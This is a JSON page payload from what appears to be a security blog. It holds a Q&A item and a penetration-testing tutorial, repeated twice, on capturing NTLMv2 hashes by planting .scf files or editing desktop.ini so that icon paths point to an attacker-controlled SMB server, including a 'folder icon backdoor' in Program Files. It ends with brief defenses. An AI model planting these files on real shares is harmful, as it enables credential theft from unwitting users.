[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWvSWiZBLnS3u2ZWKhpAawnfO0UXNUqZQwAIyXtRZZ-M":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},879,"What are the recommended defense strategies against SCF and desktop.ini icon-based NTLM hash theft?","Defenses include regularly scanning file shares for `.scf` and `desktop.ini` files that contain UNC paths in `IconFile` or `IconResource` attributes. If UNC icon paths are not required, block outbound SMB traffic on ports 139 and 445 using firewalls to prevent hash leakage. Additionally, educate users to avoid opening untrusted shares. For more on hash capture techniques, refer to [Penetration Techniques - Using PHP Scripts to Obtain Net-NTLM Hash from Browsers](\u002Fnews\u002Fpenetration-techniques-using-php-scripts-to-obtain-net-ntlm-hash-from-browsers).","\u003Cp>Defenses include regularly scanning file shares for `.scf` and `desktop.ini` files that contain UNC paths in `IconFile` or `IconResource` attributes. If UNC icon paths are not required, block outbound SMB traffic on ports 139 and 445 using firewalls to prevent hash leakage. Additionally, educate users to avoid opening untrusted shares. For more on hash capture techniques, refer to [Penetration Techniques - Using PHP Scripts to Obtain Net-NTLM Hash from Browsers](\u002Fnews\u002Fpenetration-techniques-using-php-scripts-to-obtain-net-ntlm-hash-from-browsers).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-using-icon-files-to-obtain-ntlmv2-hash-from-file-server-connections\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-recommended-defense-strategies-against-scf-and-desktopini-icon-base-1777481473062","defense, SCF file, desktop.ini, firewall, SMB, UNC path",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},214,"Penetration Techniques - Using Icon Files to Obtain NTLMv2 Hash from File Server Connections","penetration-techniques-using-icon-files-to-obtain-ntlmv2-hash-from-file-server-connections","Learn how attackers use modified icon files and SCF files to trick users into accessing spoofed file servers, capturing NTLMv2 hashes for password cracking.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The article 'Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections' introduced a method to capture NTLMv2 Hash from file server connections via Windows command line on the server, addressing an interesting problem:\u003C\u002Fp>\u003Cp>If you gain access to a file server within the internal network, how can you obtain passwords from more users?\u003C\u002Fp>\u003Cp>This article will adopt a different approach by modifying icon files on the file server to force users to access a spoofed file server, where packet capture is performed to obtain NTLMv2 Hash from the connections to the file server.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Adding SCF files to force users to access a spoofed file server\u003C\u002Fli>\u003Cli>Modifying folder icons to force users to access a spoofed file server\u003C\u002Fli>\u003Cli>Folder icon backdoor\u003C\u002Fli>\u003Cli>Defense strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Implementation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>By leveraging the characteristics of the SMB protocol, when a client connects to a server, it first attempts to log in using the local machine's username and password hash by default.\u003C\u002Fp>\u003Cp>When a user accesses a file server, if we can trick the user into accessing a forged file server and capture packets on the forged server, we can obtain the user's local NTLMv2 Hash.\u003C\u002Fp>\u003Cp>Therefore, the key is how to deceive the user into accessing the forged file server while ensuring stealth.\u003C\u002Fp>\u003Cp>There are multiple methods to trick users into accessing a forged file server (phishing methods are omitted here). So, is there a way to automatically access the forged file server when the user opens a file share? Of course, there is. Next, we will mainly introduce two implementation methods.\u003C\u002Fp>\u003Ch2>0x03 Adding an SCF file to force users to access the forged file server\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Other articles have already introduced this method. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fpentestlab.blog\u002F2017\u002F12\u002F13\u002Fsmb-share-scf-file-attacks\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fxianzhi.aliyun.com\u002Fforum\u002Ftopic\u002F1624\u003C\u002Fp>\u003Cp>Here is a brief introduction to the principle.\u003C\u002Fp>\u003Cp>\u003Cstrong>SCF file:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>SCF files are \"Windows Explorer Command\" files, a type of executable file interpreted by Windows Explorer Command, included in standard installations.\u003C\u002Fp>\u003Cp>There are three types:\u003C\u002Fp>\u003Cul>\u003Cli>Explorer.scf (Explorer)\u003C\u002Fli>\u003Cli>Show Desktop.scf (Show Desktop)\u003C\u002Fli>\u003Cli>View Channels.scf (View Channels)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Shell]\u003Cbr>Command=2\u003Cbr>IconFile=explorer.exe,3\u003Cbr>[Taskbar]\u003Cbr>Command=ToggleDesktop\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The IconFile attribute supports UNC paths, meaning you can specify a file on a file server, e.g., IconFile=\\\\192.168.62.130\\test\\explorer.exe,3\u003C\u002Fp>\u003Cp>Special note: When using Explore.exe to open the path containing this file, because the scf file includes the IconFile attribute, Explore.exe will attempt to retrieve the file's icon. If the icon is located on a file server, it will access that file server.\u003C\u002Fp>\u003Cp>Intuitive understanding: Opening a folder that contains an scf file with the IconFile attribute pointing to a file server will cause the local machine to automatically access the file server. During this access, it first attempts to log in using the local machine's username and password hash by default. If the file server captures the data packets, it can obtain the NTLMv2 Hash.\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Normal file server IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Spoofed file server IP: 192.168.62.130\u003C\u002Fp>\u003Cp>Client IP: 192.168.62.135\u003C\u002Fp>\u003Ch4>1. Add a file test.scf to the shared directory of the normal file server with the following content:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Shell]\u003Cbr>Command=2\u003Cbr>IconFile=\\\\192.168.62.130\\test\\test.ico\u003Cbr>[Taskbar]\u003Cbr>Command=ToggleDesktop\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconFile points to a fake file server, test.ico does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark to capture packets on the fake file server\u003C\u002Fh4>\u003Ch4>3. Client accesses the normal file server\u003C\u002Fh4>\u003Ch4>4. The fake file server obtains the NTLMv2 Hash of the client's current user\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017291301_0_7dd8b25c48.jpeg\">\u003C\u002Fp>\u003Cp>Construct a specific format username::domain:challenge:HMAC-MD5:blob, then crack using Hashcat\u003C\u002Fp>\u003Cp>For specific cracking methods, refer to the article:\u003C\u002Fp>\u003Cp>\"Introduction to Windows Password Hashes – NTLM Hash and Net-NTLM Hash\"\u003C\u002Fp>\u003Cp>Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections\u003C\u002Fp>\u003Cp>Through practical testing, we can see that the key to exploitation is to add an scf file on the file server and wait for users to access it\u003C\u002Fp>\u003Cp>So, is there a more covert method?\u003C\u002Fp>\u003Ch2>0x04 Modifying Folder Icons to Force Users to Access a Fake File Server\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Referring to the exploitation principle of scf files, we need to find special files that can specify the IconFile attribute\u003C\u002Fp>\u003Cp>After searching, I found a suitable method: modifying folder icons to force users to access a fake file server\u003C\u002Fp>\u003Ch3>Method for modifying folder icons:\u003C\u002Fh3>\u003Cp>Select the folder - right-click - Properties - Customize - Change Icon, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017322900_1_a02f0aed5d.jpeg\">\u003C\u002Fp>\u003Cp>After modification, generate the file desktop.ini in the subdirectory of the folder, with the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>IconResource=C:\\Windows\\system32\\SHELL32.dll,3\u003Cbr>[ViewState]\u003Cbr>Mode=\u003Cbr>Vid=\u003Cbr>FolderType=Generic\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Attempt to replace the IconResource property with a UNC path: IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,3\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Normal file server IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Forged file server IP: 192.168.62.130\u003C\u002Fp>\u003Cp>Client IP: 192.168.62.135\u003C\u002Fp>\u003Ch4>1. Add the file desktop.ini in the test folder of the normal file server's shared directory, with the following content:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003Cbr>[ViewState]\u003Cbr>Mode=\u003Cbr>Vid=\u003Cbr>FolderType=Generic\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconResource points to a fake file server, SHELL32.dll does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark to capture packets on the fake file server\u003C\u002Fh4>\u003Ch4>3. Client accesses the normal file server\u003C\u002Fh4>\u003Ch4>4. The fake file server obtains the client's current user NTLMv2 Hash\u003C\u002Fh4>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017373310_2_7e7b3cfcd1.jpeg\">\u003C\u002Fp>\u003Cp>Compared to SCF files, this method offers higher stealth\u003C\u002Fp>\u003Ch2>0x05 Folder Icon Backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The principle is the same as above: modify the system folder's configuration file desktop.ini. When a user opens the specified folder, the current user's NTLMv2 Hash is sent to the fake file server\u003C\u002Fp>\u003Cp>By default, common system folders contain the configuration file desktop.ini, such as the Program Files folder. The content of desktop.ini is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21781\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Attempt to modify it by adding the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Client IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Spoofed file server IP: 192.168.62.130\u003C\u002Fp>\u003Ch4>1. Modify the client file, path is C:\\Program Files\\desktop.ini, add content\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconResource points to the spoofed file server, SHELL32.dll does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark for packet capture on the spoofed file server\u003C\u002Fh4>\u003Ch4>3. Client accesses folder c:\\\u003C\u002Fh4>\u003Ch4>4. Spoofed file server obtains the client's local current user NTLMv2 Hash\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017396028_3_6ec09c25b3.jpeg\">\u003C\u002Fp>\u003Cp>In this approach, compared to SCF files, no additional files need to be added, but administrator privileges are required.\u003C\u002Fp>\u003Ch2>0x06 Defense Strategy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the attack methods, the defense strategy is summarized as follows:\u003C\u002Fp>\u003Cp>Check for special files .scf and desktop.ini to avoid adding UNC paths.\u003C\u002Fp>\u003Cp>If not specifically needed, it is recommended to configure firewall rules to block ports 139 and 445.\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article presents an alternative method to solve the problem of obtaining passwords from more users after gaining access to a file server within an internal network.\u003C\u002Fp>\u003Cp>By modifying icon files on the file server, users are forced to access a forged file server, where packet capture is used to obtain the NTLMv2 Hash for connecting to the file server.\u003C\u002Fp>\u003Cp>Summarize defense strategies based on the attack methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The article 'Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections' introduced a method to capture NTLMv2 Hash from file server connections via Windows command line on the server, addressing an interesting problem:\u003C\u002Fp>\u003Cp>If you gain access to a file server within the internal network, how can you obtain passwords from more users?\u003C\u002Fp>\u003Cp>This article will adopt a different approach by modifying icon files on the file server to force users to access a spoofed file server, where packet capture is performed to obtain NTLMv2 Hash from the connections to the file server.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Adding SCF files to force users to access a spoofed file server\u003C\u002Fli>\u003Cli>Modifying folder icons to force users to access a spoofed file server\u003C\u002Fli>\u003Cli>Folder icon backdoor\u003C\u002Fli>\u003Cli>Defense strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Implementation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>By leveraging the characteristics of the SMB protocol, when a client connects to a server, it first attempts to log in using the local machine's username and password hash by default.\u003C\u002Fp>\u003Cp>When a user accesses a file server, if we can trick the user into accessing a forged file server and capture packets on the forged server, we can obtain the user's local NTLMv2 Hash.\u003C\u002Fp>\u003Cp>Therefore, the key is how to deceive the user into accessing the forged file server while ensuring stealth.\u003C\u002Fp>\u003Cp>There are multiple methods to trick users into accessing a forged file server (phishing methods are omitted here). So, is there a way to automatically access the forged file server when the user opens a file share? Of course, there is. Next, we will mainly introduce two implementation methods.\u003C\u002Fp>\u003Ch2>0x03 Adding an SCF file to force users to access the forged file server\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Other articles have already introduced this method. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fpentestlab.blog\u002F2017\u002F12\u002F13\u002Fsmb-share-scf-file-attacks\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fxianzhi.aliyun.com\u002Fforum\u002Ftopic\u002F1624\u003C\u002Fp>\u003Cp>Here is a brief introduction to the principle.\u003C\u002Fp>\u003Cp>\u003Cstrong>SCF file:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>SCF files are \"Windows Explorer Command\" files, a type of executable file interpreted by Windows Explorer Command, included in standard installations.\u003C\u002Fp>\u003Cp>There are three types:\u003C\u002Fp>\u003Cul>\u003Cli>Explorer.scf (Explorer)\u003C\u002Fli>\u003Cli>Show Desktop.scf (Show Desktop)\u003C\u002Fli>\u003Cli>View Channels.scf (View Channels)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Format example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Shell]\u003Cbr>Command=2\u003Cbr>IconFile=explorer.exe,3\u003Cbr>[Taskbar]\u003Cbr>Command=ToggleDesktop\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The IconFile attribute supports UNC paths, meaning you can specify a file on a file server, e.g., IconFile=\\\\192.168.62.130\\test\\explorer.exe,3\u003C\u002Fp>\u003Cp>Special note: When using Explore.exe to open the path containing this file, because the scf file includes the IconFile attribute, Explore.exe will attempt to retrieve the file's icon. If the icon is located on a file server, it will access that file server.\u003C\u002Fp>\u003Cp>Intuitive understanding: Opening a folder that contains an scf file with the IconFile attribute pointing to a file server will cause the local machine to automatically access the file server. During this access, it first attempts to log in using the local machine's username and password hash by default. If the file server captures the data packets, it can obtain the NTLMv2 Hash.\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Normal file server IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Spoofed file server IP: 192.168.62.130\u003C\u002Fp>\u003Cp>Client IP: 192.168.62.135\u003C\u002Fp>\u003Ch4>1. Add a file test.scf to the shared directory of the normal file server with the following content:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Shell]\u003Cbr>Command=2\u003Cbr>IconFile=\\\\192.168.62.130\\test\\test.ico\u003Cbr>[Taskbar]\u003Cbr>Command=ToggleDesktop\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconFile points to a fake file server, test.ico does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark to capture packets on the fake file server\u003C\u002Fh4>\u003Ch4>3. Client accesses the normal file server\u003C\u002Fh4>\u003Ch4>4. The fake file server obtains the NTLMv2 Hash of the client's current user\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017291301_0_7dd8b25c48-1.jpeg\">\u003C\u002Fp>\u003Cp>Construct a specific format username::domain:challenge:HMAC-MD5:blob, then crack using Hashcat\u003C\u002Fp>\u003Cp>For specific cracking methods, refer to the article:\u003C\u002Fp>\u003Cp>\"Introduction to Windows Password Hashes – NTLM Hash and Net-NTLM Hash\"\u003C\u002Fp>\u003Cp>Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections\u003C\u002Fp>\u003Cp>Through practical testing, we can see that the key to exploitation is to add an scf file on the file server and wait for users to access it\u003C\u002Fp>\u003Cp>So, is there a more covert method?\u003C\u002Fp>\u003Ch2>0x04 Modifying Folder Icons to Force Users to Access a Fake File Server\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Referring to the exploitation principle of scf files, we need to find special files that can specify the IconFile attribute\u003C\u002Fp>\u003Cp>After searching, I found a suitable method: modifying folder icons to force users to access a fake file server\u003C\u002Fp>\u003Ch3>Method for modifying folder icons:\u003C\u002Fh3>\u003Cp>Select the folder - right-click - Properties - Customize - Change Icon, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017322900_1_a02f0aed5d-1.jpeg\">\u003C\u002Fp>\u003Cp>After modification, generate the file desktop.ini in the subdirectory of the folder, with the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>IconResource=C:\\Windows\\system32\\SHELL32.dll,3\u003Cbr>[ViewState]\u003Cbr>Mode=\u003Cbr>Vid=\u003Cbr>FolderType=Generic\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Attempt to replace the IconResource property with a UNC path: IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,3\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Normal file server IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Forged file server IP: 192.168.62.130\u003C\u002Fp>\u003Cp>Client IP: 192.168.62.135\u003C\u002Fp>\u003Ch4>1. Add the file desktop.ini in the test folder of the normal file server's shared directory, with the following content:\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003Cbr>[ViewState]\u003Cbr>Mode=\u003Cbr>Vid=\u003Cbr>FolderType=Generic\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconResource points to a fake file server, SHELL32.dll does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark to capture packets on the fake file server\u003C\u002Fh4>\u003Ch4>3. Client accesses the normal file server\u003C\u002Fh4>\u003Ch4>4. The fake file server obtains the client's current user NTLMv2 Hash\u003C\u002Fh4>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017373310_2_7e7b3cfcd1-1.jpeg\">\u003C\u002Fp>\u003Cp>Compared to SCF files, this method offers higher stealth\u003C\u002Fp>\u003Ch2>0x05 Folder Icon Backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The principle is the same as above: modify the system folder's configuration file desktop.ini. When a user opens the specified folder, the current user's NTLMv2 Hash is sent to the fake file server\u003C\u002Fp>\u003Cp>By default, common system folders contain the configuration file desktop.ini, such as the Program Files folder. The content of desktop.ini is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[.ShellClassInfo]\u003Cbr>LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21781\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Attempt to modify it by adding the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>Actual test:\u003C\u002Fh3>\u003Cp>Client IP: 192.168.62.139\u003C\u002Fp>\u003Cp>Spoofed file server IP: 192.168.62.130\u003C\u002Fp>\u003Ch4>1. Modify the client file, path is C:\\Program Files\\desktop.ini, add content\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>IconResource=\\\\192.168.62.130\\test\\SHELL32.dll,4\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IconResource points to the spoofed file server, SHELL32.dll does not exist\u003C\u002Fp>\u003Ch4>2. Use Wireshark for packet capture on the spoofed file server\u003C\u002Fh4>\u003Ch4>3. Client accesses folder c:\\\u003C\u002Fh4>\u003Ch4>4. Spoofed file server obtains the client's local current user NTLMv2 Hash\u003C\u002Fh4>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017396028_3_6ec09c25b3-1.jpeg\">\u003C\u002Fp>\u003Cp>In this approach, compared to SCF files, no additional files need to be added, but administrator privileges are required.\u003C\u002Fp>\u003Ch2>0x06 Defense Strategy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the attack methods, the defense strategy is summarized as follows:\u003C\u002Fp>\u003Cp>Check for special files .scf and desktop.ini to avoid adding UNC paths.\u003C\u002Fp>\u003Cp>If not specifically needed, it is recommended to configure firewall rules to block ports 139 and 445.\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article presents an alternative method to solve the problem of obtaining passwords from more users after gaining access to a file server within an internal network.\u003C\u002Fp>\u003Cp>By modifying icon files on the file server, users are forced to access a forged file server, where packet capture is used to obtain the NTLMv2 Hash for connecting to the file server.\u003C\u002Fp>\u003Cp>Summarize defense strategies based on the attack methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",716,"Onedaysec",6,"published","2026-02-02T07:38:21.196Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Penetration Techniques: Using Icon Files to Capture NTLMv2 Hash","penetration testing, NTLMv2 hash, SCF file attack, file server security, icon file exploit, SMB protocol, hash capture, network security, ethical hacking, Windows security",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],878,877,876,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.063Z","2026-07-23T16:02:14.242Z","draft","2026-07-23T16:15:18.755Z"]